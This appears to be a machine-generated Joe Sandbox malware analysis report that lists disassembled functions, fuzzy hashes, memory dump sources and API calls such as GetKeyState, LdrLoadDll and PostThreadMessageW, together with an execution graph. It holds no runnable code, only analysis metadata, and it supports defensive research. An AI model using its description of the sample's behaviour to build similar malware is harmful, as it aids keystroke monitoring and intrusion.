                                                                                    • Instruction Fuzzy Hash: AD212576504304EFDB15DF64D9C8B16BBA9FB84314F20C66DE80A8B24AC33BD547CA62
                                                                                    Function 0180D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction ID: 2991bc263b7a2c45025e3b47ac621b5226b6b79a7a84c69164d5efa33cbde9f4
                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction Fuzzy Hash: 16112172404244CFCB12CF84D9C0B56BF71FB84324F24C2A9D8094B657C33AE416CBA1
                                                                                    Function 0180D4BF Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction ID: 4fbb91246287c2ac3e15130c9f8245119b3a52fa6138287fe2401a42a23b214b
                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction Fuzzy Hash: 7311DF72504284CFCB12CF54D9C4B16BF71FB88318F24C6A9EC094B696C336D55ACBA1
                                                                                    Function 0181D017 Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction ID: 97f16010e23216c89b232ed0eda8441bb1137efb65773e876825fb2a0883a5c5
                                                                                    • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction Fuzzy Hash: 5F11BE76504280CFCB12CF54D5C8B15BBA1FB44314F24C6A9D8098B65AC33BD54ACB62
                                                                                    Function 0181D1CF Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction ID: 6a644054baf50e8b8fb2c4b4d3a02bed7ac0b3aa43fe76039285f52ea55911a4
                                                                                    • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction Fuzzy Hash: A111BB76504280DFCB12CF54D5C8B15BBA2FB84324F24C6A9D8498B69AC33AE40ACB61

                                                                                    Non-executed Functions

                                                                                    Function 0CCD4610 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyState.USER32(00000001), ref: 0CCD465D
                                                                                    • GetKeyState.USER32(00000002), ref: 0CCD46A2
                                                                                    • GetKeyState.USER32(00000004), ref: 0CCD46E7
                                                                                    • GetKeyState.USER32(00000005), ref: 0CCD472C
                                                                                    • GetKeyState.USER32(00000006), ref: 0CCD4771
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: State
                                                                                    • String ID:
                                                                                    • API String ID: 1649606143-0
                                                                                    • Opcode ID: b048da52a2c2b0808b8c179c763124a716ffd458a9e2af89ceb7092c2817287c
                                                                                    • Instruction ID: c4d4e3e9e155840e4939d38d5eeac5abf3fc1d9466efd6e47185ac928bd7b4d4
                                                                                    • Opcode Fuzzy Hash: b048da52a2c2b0808b8c179c763124a716ffd458a9e2af89ceb7092c2817287c
                                                                                    • Instruction Fuzzy Hash: 3D419E718017498EEB25CF5AC5483AEBBF4BB09308F254409E259B7280C7B99185CFA5
                                                                                    Function 0CCD0040 Relevance: 1.9, Strings: 1, Instructions: 693COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    • Opcode ID: 38d545fcec970386c411edd5590e8b7ba681f38ab88f584e34018be4939526f7
                                                                                    • Instruction ID: 93d730957ebc645f2e7ad44ed6788e26b362277bb711b127a4e1d167f677f26c
                                                                                    • Opcode Fuzzy Hash: 38d545fcec970386c411edd5590e8b7ba681f38ab88f584e34018be4939526f7
                                                                                    • Instruction Fuzzy Hash: F862493281061ADFCF11DF60C984AD9B7B2FF99304F1586D5E9086B125EB71AAD6CF80
                                                                                    Function 0CCD0006 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fff?
                                                                                    • API String ID: 0-4136771917
                                                                                    • Opcode ID: 96cf87dc4416a7c16d6de7080555e73da74c45203c5d92c25ff974f37c04a6a9
                                                                                    • Instruction ID: e0fc52b9714a506d627f25cf6b02c9f633aece96a3ad2367dddd0966933fb8f0
                                                                                    • Opcode Fuzzy Hash: 96cf87dc4416a7c16d6de7080555e73da74c45203c5d92c25ff974f37c04a6a9
                                                                                    • Instruction Fuzzy Hash: 75225935900619DFCF11DF50C888AD9BBB2FF89304F158595D9086F266EB769A8ACF80
                                                                                    Function 0755BAD8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: v<$
                                                                                    • API String ID: 0-22720976
                                                                                    • Opcode ID: 22684ff3d8e6893315cdbba4607b7b111e48188ae35865fb426d7751751fb0ec
                                                                                    • Instruction ID: e14279a4ff30d511696f95e2c47d6eab7bb145abf656dfee8022c0428e69e16c
                                                                                    • Opcode Fuzzy Hash: 22684ff3d8e6893315cdbba4607b7b111e48188ae35865fb426d7751751fb0ec
                                                                                    • Instruction Fuzzy Hash: 5EE106B4E002198FDB14DFA9C594AAEBBF6FF89304F24816AD804AB355D731AD41CF60
                                                                                    Function 058B0040 Relevance: .3, Instructions: 315COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54e30d9edf0cdc8b8e900bb0ae63ccb5f0a758ac24866abf118f7cbe6a111ed3
                                                                                    • Instruction ID: 1bddcfb64da54bf367c3386876fe558e21d5d31d2e86404d1734b231cb1f9df3
                                                                                    • Opcode Fuzzy Hash: 54e30d9edf0cdc8b8e900bb0ae63ccb5f0a758ac24866abf118f7cbe6a111ed3
                                                                                    • Instruction Fuzzy Hash: 8C1271B04017458BE730CF69E94C9D93BB5BB853A8F904709D2616B2E9EBB8158FCF44
                                                                                    Function 0755B6A0 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e98e18348859cd9c8ce851d74cd18eda31142569356ac23444fd851cb608800
                                                                                    • Instruction ID: a29d04c872541e77edf9f1cbac42f253f756200a1376908ff9ecdb945567868f
                                                                                    • Opcode Fuzzy Hash: 0e98e18348859cd9c8ce851d74cd18eda31142569356ac23444fd851cb608800
                                                                                    • Instruction Fuzzy Hash: 64E1E7B4E002198FDB14DF99C594AAEBBF6FF89304F24816AD815AB355D730AD42CF60
                                                                                    Function 0755A298 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 56b9a69df20a17362121f0fa5d2048220ad05411cdac70aef780636606f192cc
                                                                                    • Instruction ID: 9ef820b1da63696a49e93c06aad41b30a1661b7d40e32d7766c5df85ee04f142
                                                                                    • Opcode Fuzzy Hash: 56b9a69df20a17362121f0fa5d2048220ad05411cdac70aef780636606f192cc
                                                                                    • Instruction Fuzzy Hash: 91E1E8B4E002198FDB14DFA9C5949AEBBF6FF89304F24826AD814AB355D731AD41CF60
                                                                                    Function 0755BF10 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c77c72c55da6506e82d62272901aa654f1d3054e70ec132edc054532de6ad255
                                                                                    • Instruction ID: e68de190b25a3e3097a471524627d7c7ab5903419ba7dee8eb030622cf90fcd6
                                                                                    • Opcode Fuzzy Hash: c77c72c55da6506e82d62272901aa654f1d3054e70ec132edc054532de6ad255
                                                                                    • Instruction Fuzzy Hash: 8DE1F8B4E0021A8FDB14DFA9C590AAEBBF6FF89304F24816AD814AB355D7319D41CF60
                                                                                    Function 07559E60 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59b796f89ea2c91399d2039cca50d53b90ae8571d50a41b8043df83bccf6927
                                                                                    • Instruction ID: 7ac53e15780c055043e04bd9099ece73c0db7ae3b3788918f97da05a6d39e653
                                                                                    • Opcode Fuzzy Hash: a59b796f89ea2c91399d2039cca50d53b90ae8571d50a41b8043df83bccf6927
                                                                                    • Instruction Fuzzy Hash: E3E1E8B4E002198FDB14DFA9C5909AEBBF6FF89304F24816AD814AB355D735AD42CF60
                                                                                    Function 01B0DD14 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 533075afc429691236107004ca07dc114cfb9fdf2c7bcb821152f853bdf705c2
                                                                                    • Instruction ID: 1ddb7e21449b45f155f062462fd1f792d0ae03aaa4e44fba21ebd32e5c427ed6
                                                                                    • Opcode Fuzzy Hash: 533075afc429691236107004ca07dc114cfb9fdf2c7bcb821152f853bdf705c2
                                                                                    • Instruction Fuzzy Hash: 80A16232F00205CFCF2ADFB5C4845AEBBB2FF84300B1546AAE905AB295DB75D955CB80
                                                                                    Function 058B0006 Relevance: .2, Instructions: 246COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9a6d47f0e607144c95b93cfe6a234b041edd258d154f1635422168ed9d3f2a9
                                                                                    • Instruction ID: e71ae712f88c83785c4f2a65ad80fe2f4d528ebea9d5d945b3ecc59d5fc8c0a5
                                                                                    • Opcode Fuzzy Hash: d9a6d47f0e607144c95b93cfe6a234b041edd258d154f1635422168ed9d3f2a9
                                                                                    • Instruction Fuzzy Hash: 12C103B18017458FE730CF68E848AD93BB5BB85364F544709D2616B2E9EBB8258FCF44
                                                                                    Function 058BF543 Relevance: .1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 52bde7f614c65ed642d858683670cca1b956d72f870a422604d2fd3f10a0b261
                                                                                    • Instruction ID: 644f27f04bca47c98b069c18aef682712f76966ba6a4b7c4c51cee0a49531123
                                                                                    • Opcode Fuzzy Hash: 52bde7f614c65ed642d858683670cca1b956d72f870a422604d2fd3f10a0b261
                                                                                    • Instruction Fuzzy Hash: 0C5155B3D4428D4BEB21FE71DC873EC7AB16B16219F7C849DC644B12A1F1EE84498B40
                                                                                    Function 058BF53F Relevance: .1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 809b4019f58378b3c9c0cb6578a44fea927a57971e260c54e1271bc139a25488
                                                                                    • Instruction ID: 792311f9e5143876a2b6a416976f94a085ed6e02c7a764c0ef8ae3676142d843
                                                                                    • Opcode Fuzzy Hash: 809b4019f58378b3c9c0cb6578a44fea927a57971e260c54e1271bc139a25488
                                                                                    • Instruction Fuzzy Hash: 905155B3D5428D8BEB20FE71DC873EC7AB26B16219F7C845DCA44B12A1F1EE84484B40

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.3%
                                                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                                                    Signature Coverage:8%
                                                                                    Total number of Nodes:138
                                                                                    Total number of Limit Nodes:9
                                                                                    execution_graph 87896 425063 87897 42507c 87896->87897 87898 4250c4 87897->87898 87901 425101 87897->87901 87903 425106 87897->87903 87904 42eb03 87898->87904 87902 42eb03 RtlFreeHeap 87901->87902 87902->87903 87907 42cd93 87904->87907 87906 4250d1 87908 42cdad 87907->87908 87909 42cdbe RtlFreeHeap 87908->87909 87909->87906 87910 42c003 87911 42c020 87910->87911 87914 1892df0 LdrInitializeThunk 87911->87914 87912 42c048 87914->87912 87915 424cc3 87916 424cdf 87915->87916 87917 424d07 87916->87917 87918 424d1b 87916->87918 87919 42ca13 NtClose 87917->87919 87925 42ca13 87918->87925 87921 424d10 87919->87921 87922 424d24 87928 42ec23 RtlAllocateHeap 87922->87928 87924 424d2f 87926 42ca30 87925->87926 87927 42ca41 NtClose 87926->87927 87927->87922 87928->87924 87929 42fba3 87930 42fbb3 87929->87930 87931 42fbb9 87929->87931 87934 42ebe3 87931->87934 87933 42fbdf 87937 42cd43 87934->87937 87936 42ebfe 87936->87933 87938 42cd5d 87937->87938 87939 42cd6e RtlAllocateHeap 87938->87939 87939->87936 87940 41e863 87941 41e889 87940->87941 87945 41e97d 87941->87945 87946 42fcd3 87941->87946 87943 41e91e 87943->87945 87952 42c053 87943->87952 87947 42fc43 87946->87947 87948 42ebe3 RtlAllocateHeap 87947->87948 87949 42fca0 87947->87949 87950 42fc7d 87948->87950 87949->87943 87951 42eb03 RtlFreeHeap 87950->87951 87951->87949 87953 42c070 87952->87953 87956 1892c0a 87953->87956 87954 42c09c 87954->87945 87957 1892c1f LdrInitializeThunk 87956->87957 87958 1892c11 87956->87958 87957->87954 87958->87954 87959 41b683 87960 41b6c7 87959->87960 87961 41b6e8 87960->87961 87962 42ca13 NtClose 87960->87962 87962->87961 87963 413e83 87964 413ea2 87963->87964 87966 42cca3 87963->87966 87967 42ccbd 87966->87967 87970 1892c70 LdrInitializeThunk 87967->87970 87968 42cce5 87968->87964 87970->87968 87977 4143f3 87978 41440d 87977->87978 87983 417ba3 87978->87983 87980 41442b 87981 414470 87980->87981 87982 41445f PostThreadMessageW 87980->87982 87982->87981 87984 417bc7 87983->87984 87985 417c03 LdrLoadDll 87984->87985 87986 417bce 87984->87986 87985->87986 87986->87980 87987 419155 87988 42ca13 NtClose 87987->87988 87989 41915f 87988->87989 87990 401b94 87991 401ba1 87990->87991 87994 430073 87991->87994 87997 42e673 87994->87997 87998 42e6bc 87997->87998 88009 4073c3 87998->88009 88000 42e6d2 88008 401c17 88000->88008 88012 41b493 88000->88012 88002 42e6f1 88003 42e706 88002->88003 88027 42cde3 88002->88027 88023 428593 88003->88023 88006 42e720 88007 42cde3 ExitProcess 88006->88007 88007->88008 88030 416863 88009->88030 88011 4073d0 88011->88000 88013 41b4bf 88012->88013 88041 41b383 88013->88041 88016 41b504 88019 41b520 88016->88019 88021 42ca13 NtClose 88016->88021 88017 41b4ec 88018 41b4f7 88017->88018 88020 42ca13 NtClose 88017->88020 88018->88002 88019->88002 88020->88018 88022 41b516 88021->88022 88022->88002 88024 4285f4 88023->88024 88026 428601 88024->88026 88052 418a13 88024->88052 88026->88006 88028 42cdfd 88027->88028 88029 42ce0e ExitProcess 88028->88029 88029->88003 88031 41687d 88030->88031 88033 416896 88031->88033 88034 42d463 88031->88034 88033->88011 88036 42d47d 88034->88036 88035 42d4ac 88035->88033 88036->88035 88037 42c053 LdrInitializeThunk 88036->88037 88038 42d509 88037->88038 88039 42eb03 RtlFreeHeap 88038->88039 88040 42d51c 88039->88040 88040->88033 88042 41b479 88041->88042 88043 41b39d 88041->88043 88042->88016 88042->88017 88047 42c0f3 88043->88047 88046 42ca13 NtClose 88046->88042 88048 42c110 88047->88048 88051 18935c0 LdrInitializeThunk 88048->88051 88049 41b46d 88049->88046 88051->88049 88054 418a3d 88052->88054 88053 418f3b 88053->88026 88054->88053 88060 414063 88054->88060 88056 418b6a 88056->88053 88057 42eb03 RtlFreeHeap 88056->88057 88058 418b82 88057->88058 88058->88053 88059 42cde3 ExitProcess 88058->88059 88059->88053 88064 414083 88060->88064 88062 4140ec 88062->88056 88063 4140e2 88063->88056 88064->88062 88065 41b7a3 RtlFreeHeap LdrInitializeThunk 88064->88065 88065->88063 87971 414484 87972 414436 87971->87972 87973 41448c 87971->87973 87974 414470 87972->87974 87975 41445f PostThreadMessageW 87972->87975 87975->87974 87976 1892b60 LdrInitializeThunk

                                                                                    Executed Functions

                                                                                    Function 00417BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 191 417ba3-417bcc call 42f6e3 194 417bd2-417be0 call 42fce3 191->194 195 417bce-417bd1 191->195 198 417bf0-417c01 call 42e143 194->198 199 417be2-417bed call 42ff83 194->199 204 417c03-417c17 LdrLoadDll 198->204 205 417c1a-417c1d 198->205 199->198 204->205
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 71218bac6e36321b6e1c0b7bafe984d5bf27c0eeb1ac48b236bab1f2ac52d990
                                                                                    • Instruction ID: 2347c8aedde274631da5365697429d4869f71b6cbb4c3965c355fedac50688a3
                                                                                    • Opcode Fuzzy Hash: 71218bac6e36321b6e1c0b7bafe984d5bf27c0eeb1ac48b236bab1f2ac52d990
                                                                                    • Instruction Fuzzy Hash: 9A0175B1E0410DA7DF10DBE5DC42FDEB778AB14308F4041A6E90897240F634EB58CB95
                                                                                    Function 0042CA13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 216 42ca13-42ca4f call 404753 call 42dc33 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                    • Instruction ID: db200549b6b222148207f8d6f986de2405ec562ad3a5bd5d5972b8caa0164721
                                                                                    • Opcode Fuzzy Hash: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                    • Instruction Fuzzy Hash: EDE04F352402147BC520AA5ADC41F9B776CDBC5714F408419FA5867141CAB4790187A5
                                                                                    Function 01892B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 230 1892b60-1892b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 5fa687cefb4bed332b44a6e534afdef5e7aa330407efea31a1429850b8197ed7
                                                                                    • Instruction ID: 3dd105c9e013075fb6c22b273cee4011d9ba095fcb9e233ecc3e284007499a11
                                                                                    • Opcode Fuzzy Hash: 5fa687cefb4bed332b44a6e534afdef5e7aa330407efea31a1429850b8197ed7
                                                                                    • Instruction Fuzzy Hash: 9F9002A170240007510571984424616400A97E1302B95C021E3018590DC5259A956236
                                                                                    Function 01892DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 232 1892df0-1892dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c2abb4add8bbe1f6d7d4b48b5343ecff96c443592a809f045cb4d8abcf43d1f5
                                                                                    • Instruction ID: 5b85ee20379013cd45c499ab08f64e2c55bd1aaac5bf668750203582afdb39d8
                                                                                    • Opcode Fuzzy Hash: c2abb4add8bbe1f6d7d4b48b5343ecff96c443592a809f045cb4d8abcf43d1f5
                                                                                    • Instruction Fuzzy Hash: 3090027170140417E11171984514707000997D1342FD5C412A2428558DD6569B56A232
                                                                                    Function 01892C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 231 1892c70-1892c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 38b4091f7ef8f04140b7be66df39233432638516406b9cab2002e2cd699eded9
                                                                                    • Instruction ID: b75f445c03672c3ff2a2d6f347882b0084dedaaa0f76db77e4c4c2774672b4b5
                                                                                    • Opcode Fuzzy Hash: 38b4091f7ef8f04140b7be66df39233432638516406b9cab2002e2cd699eded9
                                                                                    • Instruction Fuzzy Hash: 3390027170148807E1107198841474A000597D1302F99C411A6428658DC6959A957232
                                                                                    Function 018935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 233 18935c0-18935cc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b9490f92b8a06dc7bae61d1e5f34d201646af68a460a588a01c8b1d75a83ab43
                                                                                    • Instruction ID: 2d27b2b106ebe35c52a2a4e6fdb0b1ab893c59a5b10d1660b55072ae33644f95
                                                                                    • Opcode Fuzzy Hash: b9490f92b8a06dc7bae61d1e5f34d201646af68a460a588a01c8b1d75a83ab43
                                                                                    • Instruction Fuzzy Hash: 1E900271B0550407E10071984524706100597D1302FA5C411A2428568DC7959B5566B3
                                                                                    Function 00414394 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
